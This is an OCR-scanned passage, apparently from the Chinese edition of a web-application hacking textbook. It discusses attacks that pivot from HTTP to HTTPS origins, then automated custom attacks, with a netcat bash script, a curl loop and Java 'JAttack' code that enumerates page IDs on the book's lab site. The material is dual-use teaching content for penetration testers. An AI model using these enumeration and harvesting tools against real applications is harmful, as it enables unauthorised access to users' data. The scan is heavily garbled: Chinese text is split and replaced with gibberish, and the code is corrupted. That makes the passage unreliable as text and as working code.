些 请 求 的 响应 中 返回 任意 内 容 。 在 这 种 情况 下 ， 攻 击 者 可 以 采用 各 种 技 
巧 来 攻击 应 用 程序 域 的 HITPS 来 源 。 

口 首先 ， 如 介绍 cookie 动 持 攻 击 时 所 述 ， 攻 击 者 可 以 使 用 通过 普通 
HTTP 传 送 的 响应 来 设置 或 更 新 HTTPS 请 求 使 用 的 cookie 值 。 即 使 cookie 
最 初 通过 HTTPS 设 置 并 被 标记 为 安全 ， 攻 击 者 仍然 可 以 这 样 做 。 如 果 有 
任何 cookie 值 由 在 HTTPS 来 源 中 运行 的 脚本 代码 以 危险 的 方式 进行 处 
理 ， 攻 击 者 就 可 以 利用 cookie 注 入 攻击 、 通 过 该 cookie 来 实施 XSS 攻 击 。 

口 其 次 ， 我 们 在 前 面 讲 到 ， 一 些 浏览 器 扩展 并 不 能 正确 隔离 通过 
HTTP 和 HTTPS 加 载 的 内 容 ， 并 将 这 些 内 容 视 为 属于 同一 来 源 。 这 时 ， 
攻击 者 的 脚本 (由 诱发 的 HTTP 请 求 的 响应 返回 〉 就 可 以 利用 此 类 扩展 
来 读 取 或 写 入 用 户 使 用 HTTPS 访 问 的 页 面 的 内 容 。 

要 实施 上 述 攻 击 ， 需 要 通过 某 种 方法 ， 如 从 用 户 疝 任何 其 他 域 提 出 
的 HTTP 请 求 返回 重 定向 响应 ， 诱 使 用 户 问 目标 域 提 出 任意 HTTP 请 求 。 
你 可 能 认为 极为 注重 安全 的 用 户 并 不 会 受到 上 述 攻 击 。 假 设 用 户 一 次 仅 
访问 一 个 Web 站 点 ， 并 在 访问 每 个 新 站 点 之 前 重新 启动 浏览 器 。 假 设 他 
使 用 全 新 的 浏览 器 登录 自己 的 银行 应 用 程序 ， 并 且 该 程序 仅 使 用 HTTPS 
传输 数据 。 他 是 否 会 受到 中 间 人 攻击 呢 ? 

令 人 担心 的 是 答案 是 肯定 的 ， 他 可 能 会 受到 攻击 。 今 天 的 浏览 器 会 
在 后 台 提 出 各 种 普通 HTTP 请 求 ， 而 不 论 用 户 访 问 哪 一 个 域 。 常 见 的 例 
子 包括 反 钓鱼 列 表 、 版 本 ping 以 及 针对 RSS 源 的 请 求 。 这 时 ， 攻 击 者 可 
以 通过 HTTP， 用 指 癌 目标 域 的 重 定 向 来 响应 其 中 的 任何 请 求 。 如 果 浏 
览 器 直接 访问 该 重 定向 ， 攻 击 者 就 可 以 实施 上 述 某 种 攻击 ， 首 先 攻破 目 
标 域 的 HTTP 来 源 ， 然 后 将 攻击 扩展 到 HTTPS 来 源 。 















































注重 安全 的 用 户 如 条 需要 通过 不 可 信 网 络 访问 受 HITPS 保 护 的 敏感 
内 容 ， 可 以 将 浏览 器 的 代理 配置 设置 为 “对 除 HTTPS 以 外 的 所 有 协议 使 
FTCA AH ig A”, 从 而 在 一 定 程 度 上 阻止 上 述 攻 击 。 即 使 这 样 做 ， 
他 们 仍然 需要 当心 针对 SSL 的 主动 攻击 〈 该 主题 不 属于 本 书 的 讨论 范 


围 ) 。 


13.8 ”小结 


我 们 已 经 分 析 了 各 种 情形 ， 说 明了 Web 应 用 程序 中 存在 的 漏洞 是 如 
何 令 它 的 用 户 踢 受 恶意 攻击 的 。 许 多 这 种 漏洞 都 非常 难以 理解 和 发 现 ， 
而 且 在 这 个 过 程 中 往往 需要 进行 大 量 的 调查 ， 为 此 付出 的 努力 超出 了 它 
们 作为 某 个 重要 攻击 的 前 提 的 实际 意义 。 然 而 ， 严 重 的 漏洞 党 第 隐藏 在 
大 量 无 关 紧 要 的 客户 端 缺 陷 之 中 ， 而 攻击 者 则 可 以 利用 这 类 漏洞 对 应 用 
程序 实施 攻击 。 因 此 ， 许 多 时 候 ， 付 出 这 样 的 努力 还 是 值得 的 。 

而 且 ， 随 着 人 们 对 Web 应 用 程序 安全 意识 的 逐渐 增强 ， 直 接 针对 服 
务 需 组 件 的 攻击 可 能 更 难以 发 现 或 实施 。 但 是 ， 针 对 其 他 用 户 的 攻击 ， 
无 论 其 结果 好 坏 ， 肯 定 会 成 为 每 个 人 将 来 必须 面 对 的 问题 。 


























13.9 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
(1) 己 知 一 项 应 用 程序 功能 将 一 个 查询 字符 串 参 数 的 内 容 插入 到 
某 个 HTTP 重 定向 的 Location 消 息 关 中。 利用 这 种 行为 ， 攻 击 者 可 以 实施 


哪 3 种 不 同类 型 的 攻击 ? 
(2) 要 针对 应 用 程序 的 一 项 敏感 功能 实施 CSRF 攻 击 ， 必 须 满足 什 
么 前 提 条 件 ? 


(3) 哪 3 种 防御 措施 可 用 于 防止 JSON 动 持 攻击 ? 
(4) 对 于 以 下 每 一 种 技术 ， 确 定 该 技术 请 求 /crossdomain.xml 正 确 
实施 域 隔离 的 任何 情形 : 
(a) Flash 
(b) Java 
(c) HTML5 
(d) Silverlight 
(5)“ 我 们 不 会 受到 单 击 支持 攻击 ， 因 为 我 们 不 使 用 框架 。” 以 上 
表述 是 否 正 确 ， 为 什么 ? 
(6) 已 知 在 某 应 用 程序 使 用 的 昵称 中 存在 一 个 永久 性 XSS 漏 洞 。 
此 字符 串 仅 在 配置 它 的 用 户 登 录 应 用 程序 时 癌 访 用户 显 示 。 请 描述 用 于 
攻破 该 应 用 程序 的 其 他 用 户 的 攻击 所 需 执行 的 步骤 。 
(7) 如 何 测 试 应 用 程序 是 否 允 许 使 用 XMLHttpRequest 提 出 跨 域 请 
ve ? 
C8) venti a ea AY 5 EAS Ee HE (EX cookie 3A V7 iE 
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定制 攻击 目 动 化 


本 章 不 再 介绍 任何 新 的 漏洞， 而 是 分 析 向 Web 应 用 程序 实施 攻击 
的 一 个 关键 问题 一 一 如 何 使 用 目 动 控制 加 强 并 促进 定制 攻击 。 我 们 所 讨 
论 的 技巧 可 用 于 整个 应 用 程序 以 及 攻击 过 程 的 每 一 个 阶段 ， 包 括 最 初 的 
解析 过 程 到 实际 的 应 用 。 

每 一 个 Web 应 用 程序 都 各 不 相同 。 渗 透 测试 员 需 要 使 用 各 种 手动 操 
作 与 技巧 癌 应 用 程序 实施 有 效 攻 击 ， 以 理解 它 的 行为 ， 并 探查 其 中 存在 
的 漏洞 。 同 时 还 必须 友 挥 想象 ， 利 用 自己 的 经 验 与 丰 觉 。 通 常 ， 测 试 员 
应 当 根据 已 经 确定 的 特殊 行为 ， 以 及 应 用 程序 允许 与 其 交互 并 对 其 进行 
控制 的 特定 情形 ， 实 施 本 质 上 定制 或 和 目 定 义 的 攻击 。 手 动 实施 定制 可 能 
极其 费力 ， 而 且 容 易 出 错 。 为 此 ， 最 成 功 的 Web 应 用 程序 黑客 往往 会 努 
力 简 化 他 们 的 定制 攻击 ， 设 法 将 其 自动化， 使 其 更 简单 、 快 捷 、 高 效 。 

本 章 将 讨论 一 种 实现 定制 攻击 目 动 控制 的 公认 方法 。 这 种 方法 络 合 
了 人 类 智 意 及 计算 机 蛮 力 的 优点 ， 第 第 会 造成 破坏 性 的 后 果 。 本 章 还 将 
介绍 使 用 目 动 化 技巧 时 遇 到 的 各 种 障碍 ， 以 及 避 开 这 些 障 碍 的 方法 。 











14.1 应 用 定制 目 动 化 了 


在 以 下 3 种 情况 下 ， 定 制 自动 化 攻击 技巧 有 助 于 渗透 测试 员 向 Web 
应 用 程序 实施 攻击 。 

口 枚 举 标识 符 。 大 多 数 应 用 程序 使 用 各 种 名 称 与 标识 符 指 代数 据 和 
资源 ， 如 账号 、 用 户 名 和 文档 ID。 测 试 员 需要 经 常 浏览 数目 庞大 的 潜在 
标识 符 ， 才 能 枚 举 出 那些 有 效 或 值得 进一步 研究 的 标识 符 。 在 这 种 情况 
下 ， 可 以 使 用 完全 定制 的 自动 技巧 来 分 析 一 组 可 能 的 标识 符 ， 或 者 表 历 
应 用 程序 所 使 用 的 标识 符 的 语法 范围 。 

使 用 页 码 参 数 获取 特殊 内 容 的 应 用 程序 就 是 一 个 
典型 的 示例 : 
http://mdsec.net/app/ShowPage.ashx?PageNo=10069 
在 浏览 应 用 程序 的 过 程 中 ， 会 发 现 大 量 有 效 的 
PageNo 值 ; 但 是 ， 要 确定 每 一 个 有 效 值 ， 必 须 循环 碍 
找 整个 语法 范围 ， 而 手动 操作 根本 无 法 做 到 这 一 点 。 

口 获 取 数 据 。 通 过 提出 专门 设计 的 特殊 请 求 ， 利 用 各 种 Web 应 用 程 
厅 漏 洞 ， 测 试 员 就 可 以 从 应 用 程序 中 提取 到 有 用 的 或 敏感 的 数据 。 例 
如 ， 个 人 资料 页 面 可 能 会 显示 当前 用 户 的 个 人 与 银行 交易 信息 ， 并 指出 
该 用 户 在 应 用 程序 中 的 权限 。 通 过 一 个 访问 控制 漏洞 ， 就 可 以 查看 任何 
用 户 的 个 人 资料 页 面 ， 但 一 次 只 能 获得 一 名 用 户 的 资料 。 要 获得 所 有 用 
户 的 资料 ， 可 能 需要 提交 成 干 上 万 个 请 求 。 这 时 ， 束 可 以 使 用 一 个 自动 
化 定制 攻击 截获 所 有 数据 ， 而 不 是 进行 手动 操作 。 

获取 有 用 数据 的 一 个 示例 是 对 前 面 描述 过 的 枚 举 
攻击 的 扩展 。 这 时 不 必 确 认 到 底 哪 些 PageNo 值 为 有 效 
值 ; 相反 ， 可 以 利用 目 动 化 攻击 来 从 获得 的 每 个 页 面 
中 提取 出 HTML 标 题 标签 (title tag) 的 内 容 ， 迅 速 扫 
HAR. ARAH AZE 

口 Web 应 用 程序 模糊 测试 。 当 描述 探查 常见 web 应 用 程序 漏洞 时 ， 
能 够 见 到 大 量 的 示例 ， 在 这 些 示 例 中 ， 探 查 漏洞 的 最 佳 方法 是 提交 各 种 
反常 的 数据 和 攻击 字符 串 ， 然 后 检查 应 用 程序 的 啊 应 ， 查 找 任何 表示 可 
能 存在 漏洞 的 异常 现象 。 在 大 型 应 用 程序 中 ， 在 进行 初步 解析 过 程 中 ， 
己 经 确定 一 些 需 要 探查 的 特殊 请 求 ， 每 个 请 求 都 包含 各 种 不 同 的 参数 。 
手动 检查 每 一 个 参数 既 费 时 又 费力 ， 而 且 可 能 会 忽略 大 部 分 受 攻击 面 。 
但 是 ， 使 用 定制 自动 攻击 技巧 ， 就 可 以 立即 生成 大 量 包含 常用 攻击 字符 
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我 们 将 详细 讨论 这 三 种 情形 ， 并 说 明 如 何 利用 定制 自动 攻击 技巧 显 
普 提 高 攻击 效率 。 
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常 使 用 名 称 或 标识 符 指 代 各 种 数据 ， 渗 透 测 试 员 的 任务 是 查 明 它 使 用 的 
部 分 或 全 部 有 效 的 标识 符 。 以 下 是 一 些 需要 枚 举 出 标识 符 的 情况 。 

口 应 用 程序 的 登录 功能 返回 详尽 的 错误 消 恩 ， 指 出 登录 失败 是 因为 
用 户 名 不 存在 或 密码 错误 。 在 这 种 情况 下 ， 可 以 遍历 一 组 冲 见 的 用 户 
名 ， 并 尝试 用 每 一 个 用 户 名 登录 ， 从 而 将 攻击 范围 缩小 至 那些 已 知 有 效 
Sr tee INN Ri gee a a 


口 许 多 应 用 程序 使 用 标识 符 指 代 应 用 程序 处 理 的 各 种 资源 ， 如 文档 
ID、 账 号 、 履 员 号 码 和 日 志 记 录 。 通 常 ， 应 用 程序 会 泄露 一 些 确定 特殊 
标识 符 是 否 有 效 的 方法 。 因 此 ， 过 历 应 用 程序 使 用 的 标识 符 的 语法 范围 
就 可 以 获得 所 有 这 些 资 源 。 

O 如 果 应 用 程序 生成 的 会 话 令 牌 可 以 预测 ， 那 么 ， 以 应 用 程序 发 布 
的 一 些 令 牌 为 基础 进行 推 师 ， 就 可 以 支持 其 他 用 户 的 令 牌 。 根 据 这 个 过 
程 的 准确 程度 ， 可 能 需要 测试 大 量 令 牌 才能 确定 每 一 个 有 效 的 值 。 


14.2.1 基本 步骤 


设计 一 个 枚 举 有 效 标识 符 的 定制 自动 攻击 的 第 一 步 是 查找 一 个 具有 
以 下 特点 的 请 求 /响应 对 。 

口 请 求 的 参数 中 包含 所 针对 的 标识 符 。 例 如 ， 在 一 个 显示 应 用 程序 
页 面 的 功能 中 ， 请 求 中 可 能 包含 参数 PageNo=10069。 

口 当 改变 这 个 参数 的 值 时 ， 服 务 器 对 这 个 请 求 的 响应 也 会 发 生 相 应 
变化 。 例 如 ， 如 果 请 求 一 个 有 效 的 PageNo， 服 务 器 可 能 返回 一 个 包含 指 
reer ale 如 果 请 求 一 个 无 效 的 值 ， 它 可 能 会 返回 一 个 常见 的 
普 误 消息 。 

确定 一 个 适当 的 请 求 /响应 对 后 ， 接 下 来 应 向 应 用 程序 提交 大 量 自 
动 请 求 ， 循 环 浏览 所 有 潜在 的 标识 符 ， 或 者 遍历 已 知 应 用 程序 使 用 的 标 
识 符 的 语法 范围 。 然 后 ， 监 控 应 用 程序 对 这 些 请 求 的 响应 ， 查 找 表 示 提 
交 有 效 标 识 符 的 “ 触 点 ”。 


14.2.2 探测“ 触 点 ” 


















































改变 请 求 中 的 参数 值 后 ， 啊 应 的 许多 特征 会 发 生 系 统 性 的 改变 ， 它 
们 是 实施 自动 攻击 的 基础 。 

1. HTTP 状 态 人 码 

根据 请 求 提交 的 参数 值 ， 许 多 应 用 程序 系统 性 地 返回 各 种 不 同 的 状 
态 码 。 在 枚 举 标识 符 的 攻击 中 ， 最 常见 的 状态 码 包 括 以 下 几 种 。 

口 200， 默 认 状 态 码 ， 表 示 请 求 成 功 提交 。 

口 301 或 302， 重 定 同 到 男 外 一 个 URL。 

口 401 或 403， 请 求 未 获 授 权 或 被 禁止 。 

口 404， 被 请 求 的 资源 未 发 现 。 

口 500， 服 务 器 在 处 理 请 求 时 遇 到 错误 。 

2 响应 长 度 

应 用 程序 中 的 动态 页 面 常 党 使 用 一 个 页 面 模板 建立 啊 应 (其 长 度 固 
E) ， 并 在 这 个 模板 中 插入 针对 每 个 啊 应 的 内 容 。 如 果 针 对 每 个 啊 应 的 
内 容 不 存在 或 无 效 〈 例 如 ， 请 求 了 一 个 错误 的 文档 ID) ， 那 么 应 用 程序 
就 会 返回 一 个 空白 响应 。 这 时 ， 响 应 长 度 就 是 证 明文 档 ID 是 否 有 效 的 一 
个 可 靠 指 标 。 

在 其 他 情况 下 ， 啊 应 长 度 不 同 可 能 表示 发 生 错误 或 存在 其 他 功能 。 
根据 我 们 的 经 验 ， 在 绝 大 多 数 情 况 下 ，HTTP 啊 应 码 与 啊 应 长 度 就 足以 
确定 反常 的 啊 应 。 

3. 啊 应 主体 

应 用 程序 返回 的 数据 中 常常 包含 可 用 于 探测 “ 触 点 ”的 字面 量 字 符 串 
或 模式 。 例 如 ， 如 果 请 求 一 个 无 效 的 文档 ID， 啊 应 中 可 能 包含 字符 串 
Invalid document ID。 有 时 ， 即 使 HITP 响 应 码 没 有 变化 ， 但 由 于 响应 中 
包含 动态 内 容 ， 总 体 响应 长 度 会 发 生 改 变 。 因 此 ， 在 响应 中 搜索 一 个 特 
丈 的 字符 串 或 模式 可 能 是 确定 “ 触 点 ”的 最 佳 方法 。 

4. Location 消息 头 

有 了 时候， 应 用 程序 会 以 一 个 HTTP 重 定向 (状态 码 为 301 或 302〉 响 
应 访问 某 个 特殊 URL 的 请 求 ， 重 定 同 的 目标 则 取决 于 在 请 求 中 提交 的 参 
数 。 例 如 ， 如 果 提 交 正 确 的 报告 名 称 ， 一 个 查看 报告 的 请 求 可 能 会 导致 
一 个 目标 为 /download.jsp 的 重 定 同 ; 否则 ， 重 定向 就 指 癌 /error.jsp。 
i 目标 在 Location 消 息 头 中 指定 ， 这 种 方法 同样 也 可 用 于 确 

5. Set-Cookie 消 息 头 

有 了 时候 ， 应 用 程序 可 能 会 以 同样 的 方式 啊 应 一 组 请 求 ， 唯 一 例外 的 
是 有 些 时 候 它 会 设 定 一 个 cookie。 例 如 ， 每 个 请 求 都 会 遇 到 相同 的 重 定 
问 ， 但 如 果 证 书 有 效 ， 应 用 程序 就 会 设 定 一 个 包含 会 话 令 牌 的 cookie。 
客户 端 访问 重 定 同 得 到 的 内 容 取 雇 于 是 否 提交 了 有 效 的 会 话 令 牌 。 





















































6. 时间 延 迟 

少数 情况 下 ， 无 论 提 交 的 参数 是 否 有 效 ， 服 务 器 响应 返回 的 实际 内 
容 可 能 完全 相同 ， 但 是 它 返回 响应 的 时 间 可 能 稍 有 不 同 。 例 如 ， 如 果 使 
用 一 个 无 效 的 用 户 名 登录 ， 应 用 程序 可 能 会 立即 通过 一 个 并 不 包含 太 多 
信息 的 常规 消息 做 出 响应 。 但 是 ， 如 果 提 交 的 是 有 效 的 用 户 名 ， 应 用 程 
序 就 需要 进行 各 种 后 端 处 理 来 确认 用 户 提 交 的 证 书 ， 其 中 一 些 处 理 可 能 
要 进行 大 量 计 算 ， 如 果 发 现 证 书 错 误 ， 再 返回 相同 的 消息 。 如 果 远 程 检 
测 到 这 种 时 间 差 异 ， 就 可 以 用 它 来 确定 攻击 中 的 “* 触 点 >"。〈 其 他 类 型 的 
软件 ， 如 旧版 的 OpenSSH 中 也 常常 发 现 这 种 漏洞 。) 

















YY 提示 选择 “ 触 点 ?指标 的 主要 目的 是 找到 一 个 或 一 组 〈 如 
果 结 合 在 一 起 ) 完全 可 人 靠 的 “ 触 点 ”。 但 是 ， 在 一 些 攻击 中 ， 提 前 并 
不 知道 什么 是 “ 触 点 ”。 例 如 ， 妆 渗透 测试 员 针对 登录 功能 实施 攻 
击 ， 尝 试 枚 举 用 户 名 时 ， 并 没有 一 个 有 效 的 用 户 名 可 帮助 他 确定 应 
用 程序 在 遇 到 “ 触 点 "时 的 行为 。 在 这 种 情况 下 ， 最 好 是 监控 应 用 程 
序 中 刚刚 描述 的 各 种 特征 ， 寻 找 其 中 出 现 的 任何 异常 现象 。 











14.2.3 编写 攻击 及 


假设 已 经 确定 以 下 URL， 如 果 提 交 一 个 有 效 的 PageNo 值 ， 它 将 返回 
200 啊 应 码 ; 否则 它 就 返回 500 啊 应 码 ; 


http: //mdsec.net/app/ShowPage.ashx?PageNo=-10069 


o Na 自动 攻击 并 且 枚 举 有 效 页 面 ID 所 需要 的 
两 个 条 件 。 

在 这 样 简单 的 情况 下 ， 可 以 立即 创建 一 段 定 制 的 脚本 ， 实 施 一 次 目 
动 攻击 。 人 例如， 下面 的 bash 脚 本 从 stdin 读 取 一 组 潜在 的 页 面 ID， 使 用 
netcat 工 具 请 求 一 个 包含 每 个 ID 的 URL， 同 时 记录 服务 器 响应 的 第 一 
行 ， 其 中 包含 HTTP 状态 码 : 


VE masec .net 
p t-g 
whi read ic 
cho -r $ 
echo -ne *GET/app/ShowPage.ashx?PageNo=Sid HITP/1.6\r\nHost: $server\r\n\r\n" 
netcat $server Sport | head -1 
one | tee outputfile 


用 一 个 适当 的 输入 文件 (input file) 运行 这 段 脚 本 ， 得 到 以 下 输 
出 ， 可 以 迅速 从 中 确定 有 效 的 页 面 ID 


“> ./script <IDs.txt 


10060 HTTP/1.0 500 Internal Server Error 
0061 HTTP/1.0 500 Internal Server Error 
10062 HTTP/1.0 200 Ok 
10063 HTTP/1.0 200 Ok 
10064 HTTP/1.0 500 Internal Server Error 


V BR Cygwin 环 境 可 用 于 在 Windows 平 台 上 运行 bash 脚 
本 ; 此 外 ，UnxUtils 套 件 中 包含 大 量 有 用 的 GNU 实 用 工具 的 Win32 
端口 ， 如 head 和 grep。 


使 用 一 段 Windows 批 处 理 脚本 也 可 以 达到 相同 的 目的 。 下 面 的 示例 
使 用 curl 工 具 生 成 请 求 ， 并 通过 findstr 命 令 过 波 输 出 : 


for /= "tokens=1" $i in (IDs.txt) do echo $i && curl 








mdsec.net/app/ShowPage.ashx?PageNo=%i -i -s | findstr /B HTTP/1.0 


虽然 这 些 简 单 的 脚本 非常 适 于 执行 一 些 不 太 复 杂 的 任务 ， 如 循环 浏 
览 _- 组 参数 值 及 在 服务 器 响应 中 解析 某 个 属性 : 但 是 ， 在 许多 情况 下 ， 
可 能 需要 使 用 比 命令 行 脚本 更 强大 、 更 灵活 的 工具 。 我 们 首选 一 种 适当 
的 高 级 面 同 对 象 的 语言 ， 它 必须 便于 处 理 基于 字符 串 的 数据 ， 并 提供 文 
持 套 接 字 和 SSL 的 API。 满 足 这 些 标准 的 语言 包括 Java、C# 和 Python。 下 
面 将 深入 分 析 一 个 使 用 Java 的 示例 。 


14.2.4 JAttack 











JAttack 是 一 个 简单 但 功能 强大 的 工具 ， 通 过 它 ， 任 何人 只 要 懂得 一 
些 编程 基础 知识 ， 就 可 以 使 用 定制 自动 技巧 向 应 用 程序 实施 强大 的 攻 
击 。 这 个 工具 的 完整 源 代码 可 从 本 书 的 同步 网 站 
Chttp://mdsec.net/wahh) 下载 。 但 是 ， 比 源 代码 更 重要 的 是 使 用 这 个 工 
具 的 基本 技巧 ， 下 面 将 对 此 进行 简要 说 明 。 

不 要 把 请 求 仅 当做 一 个 非 结 构 化 的 文本 块 处 理 ， 而 是 要 利用 该 工具 
理解 请 求 参数 的 概念 它 是 一 个 可 被 操控 ， 并 以 特殊 方式 附加 在 请 求 上 
的 命名 数据 。 请 求 参数 可 能 出 现在 URL 请 求 字符 串 、HTTP cookie 或 
POST 请 求 主体 中 。 下 面 创建 一 个 Param 类 保存 相关 细节 。 


上 JAt tack. j java 
‘/ by Dafydd Stuttard 








import java.net.*; 
import java.ioc.*; 


class Param 
{ 


String name, value; 


Type type; 
boolean attack; 
Param(String name, String value, Type type, boolean attack) 
{ 
this.name = name; 
this.value = value; 
this.type = type; 
this.attack = attack; 
} 


enum Type 
{ 
URL, COOKIE, BODY 


} 


许多 时 候 ， 请 求 中 包含 不 希望 在 某 个 特定 的 攻击 中 修改 的 参数 ， 但 
为 了 成 功 实施 攻击 ， 仍 然 需要 包含 这 些 参数 。 可 以 使 用 attack 字 段 标记 
某 个 参数 是 否 可 在 当前 攻击 中 进行 修改 。 

要 以 一 种 特定 的 方式 修改 菏 个 参数 的 值 ，JAttack 工 具 必 须 理 解 攻击 





AARM. EDARAK, A SESE A OC ar Di 
(payload source) 。 首 先 建立 一 个 所 有 有 效 载 荷 必 须 执行 的 界面 ， 提 高 
这 个 工具 的 灵活 性 : 


interface PayloadSource 


{ 
boolean nextPayload(); 
void reset (); 
String getPayload(); 

} 


nextPayload H IA H HW F RRA ARMARE, ELBE HAE aA A 
E HH se 7 Eltrues reset AiAi EA a Aa VR ECA AIARA o 
getPayload 方 法 返回 当前 有 效 载 傈 的 值 。 

在 枚 举 文档 的 示例 中 ， 想 要 修改 的 参数 包 售 一 个 数学 伍 ， 因此 首先 
在 PayloadSource 界 面 中 执行 一 个 类 ， 生 成 数字 有 效 载 和 荷 。 可 通过 这 个 类 
指定 想 要 测试 的 数字 范围 : 











class PSNumbers implements PayloadSource 
{ 
int from, to, step, current; 
PSNumbers(int from, int to, int step) 
{ 
this.from = from; 
this.to = to; 
this.step = step; 
reset (); 


public boolean nextPayload({) 
{ 

current += step; 

return current <= to; 


public void reset() 
{ 


current = from - step; 


} 


public String getPayload()} 
{ 


return Integer.toString(current); 


} 


了 解 请 求 参数 与 有 效 载荷 源 的 概念 后 ， 我 们 已 经 拥有 足够 的 资源 ， 
能 够 生成 请 求 并 处 理 服务 器 的 啊 应 。 首 先 ， 对 攻击 进行 一 些 配 置 : 





class JAttack 


{ 


f} attack config 

String host = "mdsec.net"; 

int port = 80; 

String method = "GET"; 

String url = "/app/ShowPage.ashx"; 


Param[] params = new Param[] 


new Param("PageNo", "10069", Param.Type.URL, true}, 


}; 
PayloadSource payloads = new PSNumbers(10060, 10080, 1}; 


这 个 配置 包含 目标 的 基本 信息 ， 创 建 一 个 叫做 PageNo 的 请 求 参 数 ， 
并 指定 10060 一 10080 为 数字 有 效 载荷 源 的 范围 。 

为 了 循环 浏览 一 系列 的 请 求 并 针对 多 个 参数 ， 需 要 保持 某 种 状态 。 
使 用 一 个 简单 的 nextRequest 方 法 监控 请 求 引 警 的 状态 ， 它 在 浏览 完 所 有 
请 求 后 返回 true 值 。 


// attack state 
int currentParam = 0; 


boolean nextRequest () 


{ 
if (currentParam >= params. length) 


return false; 


if (!params[currentParam] .attack) 
{ 

currentParam++; 

return nextRequest({); 


if (!payloads.nextPayload()} 


payloads.reset(); 
currentParam++; 
return nextRequest(); 


return true; 


} 


这 个 有 状态 的 请 求 引擎 将 退 踪 当前 正 针 对 哪个 参数 ， 以 及 在 其 中 插 
入 了 什么 攻击 有 效 载 集 。 接 下 来 使 用 这 些 信息 建立 一 个 完整 的 HTTP 请 
求 。 它 包括 在 请 求 中 插入 每 种 类 型 的 参数 ， 并 增加 任何 必要 的 消 姑 尖 : 














String buiidRequest!} 


f} build parameters 
StringBuffer urlParams = new StringBufier{}; 
StringBuffer cookieParams = new StringBuffer ({); 
StringBuffer bodyParams = new StringBuffer ({); 
for (int i = 0; i < params.length; i++} 
{ 
String value = (i == currentParam) ?了 
payloads.getPayload({) 
params [i] .value; 
if (params{i!.type == Param.Type.URL) 
urlParams.append(params[i).name + "=" + value + "&"}; 
else if (params([i].type == Param.Type.COOKT=} 
cookieParams.append(paramsfil].name + "=" + value + *; °); 
else if {params[i].type == Param.Type. BODY) 
bodyParems.append{parems[i].name + "=" + value + "&"); 


// build request. 
StringBuffer req = new StringRuffer(); 
req.append(method = * * + uri}; 
if (urlParams.length{) > 0) 
reqg.append{*?" + urlParams.substring{(, urlParams.length[) LY 
req.append(" HTTP/1.0\r\nHost: " + host); 
if (cookieParams.iength() > 6) 
reg.append({*\r\nCookie: * + cookieParams.toString({}); 
if (bodyParams.length{) > 0) 
{ 
req. append(*\r\nContent-Type: application/x-www-form-uriencoGed") ; 
rec.append({*\r\nContent-Length: ”+ (bodyParams.length(} - 1)}; 
reqg.append(*\r\n\r\n"); 
rec.append (bedyParams.substring(0, bodyParams.lengtn() = 1)); 


else reg.append/{*\r\n\r\n"); 


return req.toString(}; 





> 注解 ”如 果 自 己 编写 代码 生成 POST 请 求 ， 那 么 ， 和 在 前 面 
的 代码 中 一 样 ， 就 需要 在 其 中 包含 一 个 有 效 的 Content-Length 消 息 
头 ， 指 定 每 个 请 求 中 HTTP 主 体 的 实际 长 度 。 如 果 提 交 的 是 无 效 的 
Content-Length， 大 多 数 Web 服 务 吉 或 者 将 提交 的 数据 截 短 ， 或 者 
等 待 再 提交 更 多 的 数据 。 





要 送出 请 求 ， 需 要 与 目标 Web 服 务 需 建立 网 络 连接 。 使 用 Java 之 
后 ， 建 立 TCP 连 接 、 提 区 数 据 并 读 取 服 务 器 啊 应 的 任务 都 变 得 极其 简 


单 。 


String issueRequest (String req) throws UnknownHostException, IOException 


Socket socket = new Socket (hest, port); 

OutputStream os = socket.getOutputstream(); 

os.write(req.getBytes(}); 

os.flush(); 

BufferedReader br = new BufferedReader {new InputStreamReader ( 
socket .getinputsStreem())}); 

StringBuffer response = new StringBulffer(); 


String Line; 


while {null != (line = 
respon ppend(lin 
-clo } 
r.clos } 
return response.toString(); 
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第 一 行 的 HTTP 状态 码 与 啊 应 的 总 长 度 : 


String parseResponse(String response) 





{ 
StringBuffer output = new StringRuffer(); 


S(T) + “\t*); 


` » * 
E EXC) 


output.append(response.split("\\s+", 
output.append(Integer.toString (response. length{) 


return output.toString(}; 


现在 已 经 为 实施 攻击 做 好 准备 。 最 后 只 需要 一 些 包装 器 代码 轮流 调 
用 前 面 提 到 的 每 一 个 方法 并 指出 其 结果 ， 直 到 提出 所 有 请 求 ， 


nextRequest 方 法 返回 false: 











void doAttack{) 

{ 
System.out.printin("param\tpayload\tstatus\tlength"}) ; 
String output = null; 


while (nextRequest()) 


try 
{ 


output = parseResponse(issueRequest (buildRecuest(})); 


catch (Exception e) 


{ 


output = e.toString({); 
} 
System. out.println{params [currentParam) .name + "\t" + 
payloads.getPayload() + "\t" + output}; 


} 


public static void main(String[]) args) 
{ 


new JAttack().doAttack{); 


} 
整个 过 程 就 是 这 样 ! 为 编写 并 运行 这 些 代码 ， 需 要 下 载 Sun 公 司 的 
Java SDK 与 JRE， 然 后 运行 下 面 的 脚本 : 
> javac JAttack.java 
> java JAttack 


根据 我 们 在 示例 中 的 配置 ， 这 个 工具 输出 如 下 结 


param payload status length 
PageNo 10060 500 3154 
PageNo 10061 500 3154 
PageNo 10062 200 1083 
PageNo 10063 200 1080 
PageNo 10064 500 3154 


如 果 网 络 连接 与 处 理 能 力 一 切 正常 ，JAttack 每 分 钟 能 够 提出 数 百 个 


请 求 ， 并 输入 相关 细节 ， 帮 助 迅速 确定 需要 进一步 研究 的 有 效 文档 标识 


付 
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看 起 来 ， 似 乎 刚刚 描述 的 攻击 并 不 比 前 面 只 需要 几 行 代码 的 bash 脚 
本 实例 更 复杂 。 但 是 ，JAttack 的 设计 形式 允许 对 它 进 行 任意 修改 ， 从 而 
实施 更 加 强大 的 攻击 ， 合 并 多 个 请 求 参数 、 各 种 有 效 载荷 源 ， 并 对 啊 应 
进行 任何 复杂 的 处 理 。 下 面 几 节 将 对 JAttack 的 代码 进行 一 些 修 改 ， 使 其 
实现 更 强大 的 功能 。 








14.3 4k JŽ 


当 攻 击 应 用 程序 时 ， 定 制 目 动 化 技巧 的 第 二 个 主要 用 途 是 ， 通 过 专 
门 设计 的 特殊 请 求 ， 以 一 次 一 个 数据 的 速度 获取 信息 ， 从 而 提取 出 有 用 
的 或 敏感 的 数据 。 如 果 已 经 确定 一 个 可 供 利用 的 漏洞 (如 访问 控制 缺 
陷 ) ， 并 能 够 通过 为 一 个 未 授权 的 资源 指定 标识 符 的 方式 来 访问 这 个 资 
源 ， 那 此 时 往往 就 会 出 现 这 种 情况 。 但 是 ， 即 使 应 用 程序 完全 按 设计 者 
预计 的 方式 运行 ， 也 可 能 会 出 现 这 种 情况 。 在 下 面 这 些 情况 下 ， 渗 透 测 
